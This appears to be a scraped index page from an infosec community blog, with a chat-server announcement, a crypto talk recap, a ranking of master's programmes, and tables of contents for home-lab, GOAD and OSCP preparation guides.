If you haven’t joined us on Mattermost yet, please do! You can connect to us at https://chat.netsecfocus.com/join. Should you have any issues connecting to that at work, you can also use https://mm.netsecfocus.com/join to bypass some proxys looking for the word “chat” in the hostname. You can use the web app, desktop or mobile apps as well. Some of our users have reported that the Android beta app has been more stable for them. Those of you thinking “omg another app I have to install” or “omg another brower tab”, well you can look into using http://rambox.pro to concatenate all of your messaging into one app! For you IRC/Terminal lovers our there, we haven’t left you behind like Slack has! You can use Matterhorn to connect to us after sign up: https://github.com/matterhorn-chat/matterhorn

We thank our community for growing so large over the last 1.5yrs and we hope to grow even larger and build something truely valueable in our industry. We’ll see you on Mattermost!

Crypto 101: The Basics

Fri, 09 Jun 2017 17:00:00 +0000

Well I finally got my finger out and put together the first in a series of talks on crypto. Thank you for those that joined live and for the subsequent feedback.

This session covered some of the principles of cryptography and the lexicon, then focused on what happens during a TLS run. We delved into the Diffie-Hellman secret agreement protocol (you should now know the difference)as well as the weaknesses, mitigation,and other related protocols.

The whole recording is here and I will be making the slides available when I find a decent host that isn’t that awful LinkedIn one. In the mean time you can tap me up on slack and I’ll chuck them over (there is a bonus set of slides at the bottom of the deck that cover RSA too)

Next time we’ll be working our way further in into our TLS ciphersuite and will be looking at symmetric encryption. Exciting.

Any questions, feedback, abuse: hit me on slack or twitter @TunnyTraffic.

Vulnhub Video Walkthrough Series: Skytower

Sat, 11 Mar 2017 17:00:00 +0000

VM Link - Skytower 1.96

Vulnhub Video Walkthrough Series: Kioptrix 1.1

Sat, 11 Mar 2017 17:00:00 +0000

VM Link - Kioptrix 1.1

Rating Infosec Relevant Masters Programs

Wed, 08 Mar 2017 16:00:00 +0000

This post will delve into the masters degree programs currently offered nationwide within the US that have relevance to an infosec professional trying to get a leg up in their career. The goal is to remain as objective as possible and provide a single offering considered as the “best” choice within its relevant category.

Infosec Focused

SANS MSISE

Reason: This masters degree will offer you an level of exposure to information security, in a very practical and applicable sense, that is unparalleled by any other degree program. This exposure to the information security field, both as a whole and in the specialty you choose to pursue, also offers significant networking opportunities and a chance to achieve one of the most respected certifications; the GSE (a capstone and requisite for the degree).
Delivery: Hybrid, in-person and online.
Costs: ~$20k-45k (depending on workstudy and transferrables).

CompSci Focused

Georgia Tech OMS CS

Reason: It’s accessibility, associated costs, delivery platform, brand name, and high quality of material all conspire to make this one of the most solid choices available.
Delivery: Online
Costs: ~$16k

Efficiency Focused

WGU

Reason: This university cannot get enough props for the successes they’ve made in their stated goal: offering a quality degree that caters to the working professional. Unbeatable in the objective metrics of time-to-complete, associated costs, and employability. Regionally accredited, this school often seems as too good to be true, with a price model that allows you unlimited access to any and all classes upon enrollment for 6 month periods, allowing documented cases of individuals achieving their masters degrees in only 6 months time.
Deliver: Online
Costs: ~$3k-16k

- Kalabaster

Work-in-progress: Last Updated 2017-03-08

NetSec Focus

Setting Up and Installing GOAD or GOAD-Light on VMware ESXi

Setting Up and Installing GOAD or GOAD-Light on VMware ESXi

Table of Contents

Introduction

A word of Caution:

A word of Advice:

Requirements to deploy GOAD:

Current ESXI Setup:

Configure GOAD network Group

Obtain required packages to deploy GOAD with our Linux machine.

Stage 1: Deploying the GOAD Environment

Conclusion

TJnull's guide to building a Home Lab

Table of Contents

Introduction:

A word of advice:

Why should you build a home lab?

Things you need to consider:

Hardware

Hunting for Hardware:

Network:

Software:

Virtualization Software:

Network Virtual Devices:

Operating Systems:

Windows:

Unix and *Nix:

Apple Mac OS:

Daemons/Services

Monitoring Services/Systems:

Other Resources:

Conclusion:

The Journey to Try Harder: TJnull’s Preparation Guide for PEN-200 PWK/OSCP 2.0

Table of Contents:

Overview:

Dedication:

A Word of Warning!:

Course Syllabus

Section 1: General Course Information

Section 2: Getting Comfortable with Kali Linux

Section 3 Linux Command Line Kung-Fu:

Section 4: Essential Tools in Kali

Section 5: Getting Started with Bash Scripting

Section 6: Passive Reconnaissance

Section 7: Active Reconnaissance

Network Scanning:

Service Enumeration:

Section 8: Vulnerability Scanning

Section 9: Web Application Attacks

Tools for finding Web Vulnerabilities and conducting Web Attacks:

Web Directory Scanners:

BurpSuite:

Nikto (Created by Chris Sullo & tautology0):

HTTPIe https://httpie.io/:

Exploiting common Web-based Vulnerabilities:

Exploiting Admin Consoles:

Hands on areas to improve your web attack skills:

Section 10: Buffer Overflows for Windows and Linux

Section 11: Client-Side Attacks

Section 12: Handling Public Exploits

Section 13: Transferring Files to your target:

Section 14: Antivirus Bypassing

Section 15: Privilege Escalation

Windows Privilege Escalation Guides:

Linux Privilege Escalation Tools:

Section 16: Password Cracking

Offline Tools for Password Cracking:

Online Password Crackers:

Section 17: Port Redirection and Pivoting

Section 18: Active Directory Attacks:

Section 19: Metasploit Framework

Section 20: Powershell Empire:

Extra Resources

Setting up your Pentesting Environment:

Wargames/Hands-on Challenges:

Capture the Flag Competitions (CTFs)/Cyber Competitions:

Vulnerable Machines:

Proving Grounds:

HackTheBox: